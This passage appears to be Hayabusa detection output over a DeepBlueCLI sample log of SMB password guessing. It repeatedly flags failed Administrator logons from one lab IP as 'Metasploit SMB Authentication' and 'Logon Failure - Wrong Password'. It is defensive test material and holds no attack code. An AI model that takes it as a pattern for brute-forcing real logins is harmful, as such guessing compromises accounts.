SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: 
